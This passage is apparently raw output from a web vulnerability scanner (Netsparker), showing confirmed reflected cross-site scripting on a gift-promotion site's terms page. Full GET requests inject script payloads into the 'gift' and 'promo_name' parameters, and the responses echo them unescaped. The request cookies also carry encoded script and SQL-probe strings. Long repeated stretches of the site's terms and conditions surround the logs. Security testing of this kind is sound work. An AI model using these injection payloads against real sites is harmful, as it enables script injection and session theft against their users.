<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
For this promotion, $250 in McDonald's&reg; Arch Cards&trade;, you must complete a <i>total</i> of 24 offers as follows: <b>Page 1 (Silver) - complete any 8 offers; Page 2 (Gold) - complete any 8 offers; Page 3 (Platinum) - complete any 8 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting informat..
- /info.htm

/info.htm CONFIRMED

http://your-gift-zone.com/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift='%22--%3E%3C/sty..

Parameters

Parameter Type Value
tp GET tos
promo_name GET 2192name
catalog_id GET 13200
gift GET '"--></style></script><script>alert(0x000205)</script>
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000205)%3C/script%3E&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==; 0)>0)=; 0)<255)=; 0)>25)=; 2))=; 1))>0=; 1))<255=; 1))>255=; 1))>25=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:14:56 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db832f02e33e3t0;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,gift_cookie='"--></style></script><script>netsparker(0x000205)</script>;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Your-gift-zone</title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/global-cust-service.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/giftstatus-content.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->




<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<div id="frame">
<div id="header">
<div id="navbar">
<div class="hovermenu">
<ul>
<li><a href="http://your-gift-zone.com/info.htm?tp=faq&user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">HELP</a></li>
<li><a href="http://your-gift-zone.com/redeem.htm?user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">GIFT STATUS</a></li>
<li><a href="http://your-gift-zone.com/testimonials.htm?user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200&wrap=0" target="_self">TESTIMONIALS</a></li>
<li><a href="http://your-gift-zone.com/info.htm?tp=con&user_gift_id=&promo_name=2192name&gift=71&catalog_id=13200" target="_self">&nbsp;&nbsp;CONTACT US&nbsp;&nbsp;&nbsp;</a></li>
</ul>
</div>
</div>
<div id="mainhdr">Your-gift-zone</div>
<div id="pagehdr">Terms &amp; Conditions</div>
</div>

<div id="content" class="clearfix">
<div id="girlbody"><img src="http://i.pcp001.com/media/cs/girlbody.jpg" width="158" height="299"></div>
<div id="girlfingers"><img src="http://i.pcp001.com/media/cs/girl-fingers.jpg" width="343" height="54"></div>
<div id="mainarea">
<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name=2192name&gift='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x000205)</script>&catalog_id=13200" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
Access the registration form on the Site and enter and submit all requested information. Do not enter a P.O. Box for your mailing address. We will not ship any promotional item to a P.O. Box. You also may be offered the opportunity to answer a series of survey questions about your interests and/or request more information from our marketing partners. </li>
<br /><br />
<li><u><strong>Complete Sponsor Offers (and comply with the Cancellation Limitation)</strong></u><br />
For this promotion, $50 Gift Card, you must complete a <i>total</i> of 24 offers as follows: <b>Page 1 (Silver) - complete any 8 offers; Page 2 (Gold) - complete any 8 offers; Page 3 (Platinum) - complete any 8 offers to get your gift.</b></p>


<p>To &ldquo;complete&rdquo; each Sponsor Offer, you must complete the exact number of Sponsor Offer Requirements as indicated on the Site, the Sponsor must report to us that you have successfully completed their offer (Sponsor notification typically takes 4 weeks), and you must not exceed the Cancellation Limitation set forth below.</p>
<p>
Examples of Sponsor Offers include, without limitation, trial offers, credit cards, product offers, service offers, other low-cost or commercial Offers, and Refer-a-Friend Offers. Some Offers require a purchase to be made, while others are free trials that convert to paying obligations if not canceled or free applications that do not require an initial purchase.</p>
<p>
You must complete the required number of Sponsor Offers within 60 days following the Program Sign-up Date, and all the steps in the Program Requirements (including the mailing-in of your Gift Redemption Voucher) must be completed within 180 days of your Program Sign-up Date. To remain eligible and qualify for program offers, you must use the same personal contact information that you provided during registration when making purchases.</p>
<p>
The number and category of Sponsor Offers available for you changes on a periodic basis as new Sponsors come in to the Site and older Sponsors expire. You should check back periodically after the Program Sign-up Date for new Sponsor Offer opportunities by visiting your &ldquo;Gift Status&rdquo; section under your &ldquo;Member Account&rdquo;.</p>
<p>
We rely on each Sponsor to provide us with timely reporting and confirmation of your successful completion of their Sponsor Offer. Sponsor offers may take 4 to 6 weeks to confirm successful completions. You must save all receipts, order confirmation, records and materials that show your transaction history with each Sponsor Offer. You may be asked for copies of receipts, order confirmations and other relevant documents in the Gift Redemption process to verify your transactions with Sponsors and failure to produce the required documents for a Sponsor Offer when requested may result in you not receiving completion credit for that Sponsor Offer. In addition, we reserve the right to request proof of identity such as a copy of your driver�s license, passport or other government issued identification.</p>

<p><strong>CANCELLATION LIMITATION: </strong>You will not be eligible to receive a Gift in this Promotion if, within 30 days of your Sponsor Offer Initial Transaction Date, you cancel your participation in more than two Sponsor Offers you have completed as a part of the Program Requirements. If you were invited by a Refer-a-Friend Offer, you can't cancel your participation in any Sponsor Offers within 30 days of your Sponsor Offer Initial Transaction Date (the &ldquo;<strong>Cancellation Limitation</strong>&rdquo;). </p>

<!--header:start-->
<!--header:end-->
<li><strong><u>Refer-a-Friend </u></strong><strong><u>Offers</u></strong> � If presented with Refer-a-Friend offers, you may choose to invite friend(s) who must complete the required number of Sponsor Offers as stated in the Refer-a-Friend email sent to your friend(s) which in turn will generate a Sponsor Offer completion towards your Gift. Refer-a-Friend Offers may require multiple friends to complete the required number of Sponsor Offers in order to generate a Sponsor Offer completion as stated on the Silver, Gold, and Platinum Refer-a-Friend Offer pages.
<p>Friends you refer must register using the link provided in the Refer-a-Friend email delivered to them. Please note the Refer-a-Friend email sent to friends must comply with <u>the CAN SPAM ACT of 2003</u>. Your friend�s name, address and email address must be different than yours, although your friend(s) may use an email address that is not the same as that initially provided by you.</p>
<p>Qualified Friends must: a.) abide by these Terms and Conditions when registering on this site; b.) register with a valid residential address; c.) have only been invited once by you from either the Silver, Gold, or Platinum Sponsor Offer pages; d.) not have previously generated Refer-a-Friend Offer completions for a friend on this web site; e.) satisfy the required number of Sponsor Offers, as shown on the Refer-a-Friend Offer pages and in the Refer-A-Friend email sent to your friend(s), within sixty (60) days of your registration date; and f.) not cancel participation in Sponsor Offers within 30 days of Friend(s) Sponsor Offer Initial Transaction Date(s). </p>
</li>
<li><strong><u>Gift Redemption</u></strong>- Check the �Gift Status� section of your Member Account information on the Site on a regular basis so that you�ll be able to see your progress as various Sponsors report back to us with your completion status. Before you receive a Gift Redemption Voucher the following must occur: a.) the required number of Sponsors must have reported to us that you successfully completed their offers, and b.) you have provided the required proofs of purchase. Upon satisfying a.) and b.) your account will be updated accordingly and you will receive a Gift Redemption Voucher to print, complete and mail for your Gift. Once you have sent your Gift Redemption Voucher, the Gift Status section of your Member Account will be updated. Be sure to keep a copy of your Gift Redemption Voucher. Upon our receipt of your properly completed Gift Redemption Voucher, it will take six (6) to eight (8) weeks to ship your Gift.
<p>
<strong>Note:</strong> We are solely responsible for the fulfillment of your Gift. All questions related to Gift fulfillment should be directed to us. Please do not contact our Sponsors regarding your Gift fulfillment status. The Sponsors are solely responsible for their Offers, Program Requirements, refunds, products, cancellations and related customer service. For those questions, please contact the Sponsors directly.</p>
</li>
<li><strong><u>License to Use this Site and Become a Member</u></strong>- Upon your agreement to this Agreement, the Company hereby grants you a non-exclusive, non-transferable limited license to use this site and participate in our programs in strict accordance with the terms and conditions in this Agreement and as permitted via instructions on this site. You acknowledge and agree that all content and services available on this site are property of the Company and its advertisers and licensors and are protected by copyrights, moral rights, trademarks, service marks, patents, trade secrets, and other proprietary rights and laws, in the U.S. and internationally. All rights not expressly granted herein are fully reserved by the Company, its advertisers and licensors.</li></ol>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">5. TERMINATION/CANCELLATION OF ACCOUNTS</font></b></p>
<!--header:end-->

<p>Company may, at its sole discretion, terminate any account and deny any Gift without prior notice for:</p>
<ul>
<li>any violation of any provision of these Terms and Conditions or fraudulent activity;</li>
<li>aiding, promoting, or participating in circumvention of the Program, including, but not limited to, using any account to accrue a Gift for a third party or using a third party's account to accrue a Gift for yourself, including without limitation posting information on a website, forum, or auction that has to do with "canceling the offers" or cancellation phone numbers, cancellation time frames, and any encouragement or direction to cancel Sponsor Offers; </li>
<li>using multiple email addresses to circumvent the Program</li>
<li>signing up for and immediately cancelling multiple offer..
- /info.htm

/info.htm CONFIRMED

http://your-gift-zone.com/info.htm?tp=tos&promo_name='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ea..

Parameters

Parameter Type Value
tp GET tos
promo_name GET '"--></style></script><script>alert(0x000224)</script>
catalog_id GET 13200
gift GET 29617

Request

GET /info.htm?tp=tos&promo_name='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000224)%3C/script%3E&catalog_id=13200&gift=29617 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: 0)>255)=; 0)=1); JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==; 0)>0)=; 0)<255)=; 0)>25)=; 2))=; 1))>0=; 1))<255=; 1))>255=; 1))>25=
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:17:29 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db83389795aepka;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie='"--></style></script><script>netsparker(0x000224)</script>;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,gift_cookie=29617;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html










<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Your-gift-zone</title>
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/global-cust-service.css" />
<link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/giftstatus-content.css" />
<!--[if IE 6]><link rel="stylesheet" type="text/css" href="http://i.pcp001.com/media/cs/IE6fix.css"><![endif]-->




<style type="text/css">
#emailaddr {
margin-top:30px;
float:left;
width:355px;
padding-bottom:70px;
}
#offer {
float:left;
width:228px;
height:209px;
margin-left:0px;
}
</style>


</head>
<body>

<div id="frame">
<div id="header">
<div id="navbar">
<div class="hovermenu">
<ul>
<li><a href="http://your-gift-zone.com/info.htm?tp=faq&user_gift_id=&promo_name='"--></style></script><script>netsparker(0x000224)</script>&gift=29617&catalog_id=13200" target="_self">HELP</a></li>
<li><a href="http://your-gift-zone.com/redeem.htm?user_gift_id=&promo_name='"--></style></script><script>netsparker(0x000224)</script>&gift=29617&catalog_id=13200" target="_self">GIFT STATUS</a></li>
<li><a href="http://your-gift-zone.com/testimonials.htm?user_gift_id=&promo_name='"--></style></script><script>netsparker(0x000224)</script>&gift=29617&catalog_id=13200&wrap=0" target="_self">TESTIMONIALS</a></li>
<li><a href="http://your-gift-zone.com/info.htm?tp=con&user_gift_id=&promo_name='"--></style></script><script>netsparker(0x000224)</script>&gift=29617&catalog_id=13200" target="_self">&nbsp;&nbsp;CONTACT US&nbsp;&nbsp;&nbsp;</a></li>
</ul>
</div>
</div>
<div id="mainhdr">Your-gift-zone</div>
<div id="pagehdr">Terms &amp; Conditions</div>
</div>

<div id="content" class="clearfix">
<div id="girlbody"><img src="http://i.pcp001.com/media/cs/girlbody.jpg" width="158" height="299"></div>
<div id="girlfingers"><img src="http://i.pcp001.com/media/cs/girl-fingers.jpg" width="343" height="54"></div>
<div id="mainarea">
<!--header:start-->
<p class="headline_txt"><b><font size="+1">Effective Date: July 29, 2010.</font></b></p>
<!--header:end-->

<p>Welcome to the Your-gift-zone Web site (hereinafter the &ldquo;<strong>Site</strong>&rdquo;), operated by Reliant (&ldquo;<strong>Company</strong>&rdquo;). The following terms and conditions, the Privacy Policy and any other policies, notices, rules or guidelines posted on the Site shall govern your use of the Site and your participation in the Program. Because this terms and conditions document (the &ldquo;<strong>Terms and Conditions</strong>&rdquo;) constitutes a legal agreement between you and the Company, please read them carefully. Capitalized terms not defined in the text are defined in the section entitled &ldquo;Definitions&rdquo; at the end of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">1. YOUR AGREEMENT</font></b></p>
<!--header:end-->

<p>By using this Site, you agree to be bound by, and to comply with, these Terms and Conditions. You also agree to comply with any guidelines or rules posted on the Site, and all such guidelines and rules are hereby incorporated by reference into these Terms and Conditions. If you are dissatisfied with this Site, its content or the Terms and Conditions, you agree that your sole and exclusive remedy is to discontinue using this Site and to cancel your participation in the Program.</p>

<p><strong><em>PLEASE NOTE:</em></strong> We reserve the right, in our sole discretion, to change, modify or otherwise alter these Terms and Conditions at any time. Unless otherwise indicated, amendments will become effective on the earlier of (i) the date such amendment was posted to the Site, or (ii) at the earliest date permitted under applicable law (the &ldquo;<strong>Effective Date</strong>&rdquo;). Please review these Terms and Conditions regularly. Your continued use of the Site or the Program following the Effective Date of any amendment will constitute your acceptance of the amended Terms and Conditions. For your information, this page was last updated as of the date set forth at the top of these Terms and Conditions.</p>

<!--header:start-->
<p class="headline_txt"><b><font size="+1">2. PRIVACY</font></b></p>
<!--header:end-->

<p>
Please review our <a href="/info.htm?tp=privacy&user_gift_id=&promo_name='"--&SID=9b773fc614eb9b87053e912c83afb51f></style></script><script>netsparker(0x000224)</script>&gift=29617&catalog_id=13200" target="_self">Privacy Policy</a>, which also governs your visit to this Site, to understand our practices relating to the collection and use of personal information.
</p>

<p><strong><em>Express Consent:</em></strong> By accepting the terms and conditions of this Site and providing your telephone number, you are subscribing to a service that transmits special offers to subscribers via pre-recorded voice messages.
</p><p>
By subscribing, you are expressly consenting to receive pre-recorded telephone messages from The Firebrand Group, LLC, a Nevada company doing business as Worldwide Commerce Associates (�WCA�) that include special or discounted sales offers. You are subscribing to receive offers only from WCA, and only at the specific numbers(s) you have provided to us. Your consent will be effective regardless of whether the number you have provided: (a) is a home, business, or cell phone line; and/or (b) is or will be registered on any state or federal Do-Not-Call (DNC) list, and shall remain in effect until you revoke your consent and cancel your subscription.
</p><p>
To unsubscribe: You may cancel your subscription and revoke your consent to receive pre-recorded telephone calls at any time by either (a) utilizing the opt-out procedure included in any message you receive; or (b) by calling 800-269-0281
</p><p>
NOTE: WCA does not send offers via email, and is unable to honor any unsubscribe requests sent by other companies. If you are receiving offers via email please follow the unsubscribe instructions included therein.
</p>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">3. ELIGIBILITY FOR PARTICIPATION</font></b></p>
<!--header:end-->

To be eligible to participate in the Program, you must be at least 18 years of age at the time of registration and reside in the United States. Employees of the Company and persons related to or residing in the same household of such employees are not eligible to become Members. Corporations or other business entities are not eligible to participate. <u>Only one gift is permitted from Reliant per person and/or household for one year after your registration date. </u>


<p><strong>B. To be eligible to receive a Gift or assist a friend in receiving a Gift through a Refer-a-Friend offer, you must: (i) establish and maintain an account on the Site registered to a valid, unique e-mail address belonging only to the individual identified in the registration information; (ii) provide valid and truthful information as requested by the Company or a participating Sponsor, including your full legal name, postal address of your principal residence, land line or mobile telephone number and valid email address; (iii) agree to receive solicitations, marketing materials and other communications from us and Sponsors via e-mail, telemarketing, direct marketing, mobile marketing and any other method; (iv) have cookies enabled; (v) provide the address of your principal residence as a shipping address; and (vi) comply with each of the provisions of these Terms and Conditions.</strong></p>
<a name="prog_req"></a>
<!--header:start-->
<p class="headline_txt"><b><font size="+1">4. PROGRAM REQUIREMENTS / RULES OF PARTICIPATION </font></b></p>
<!--header:end-->

<p>To qualify for your Gift or assist a friend in qualifying for a Gift through a Refer-a-Friend offer (as defined below) in this Program, you must complete the following steps and your account must not have been terminated pursuant to Section 5:</p>

<!--header:start-->
<ol type="A">
<li><u><strong>Registration</strong></u><br />
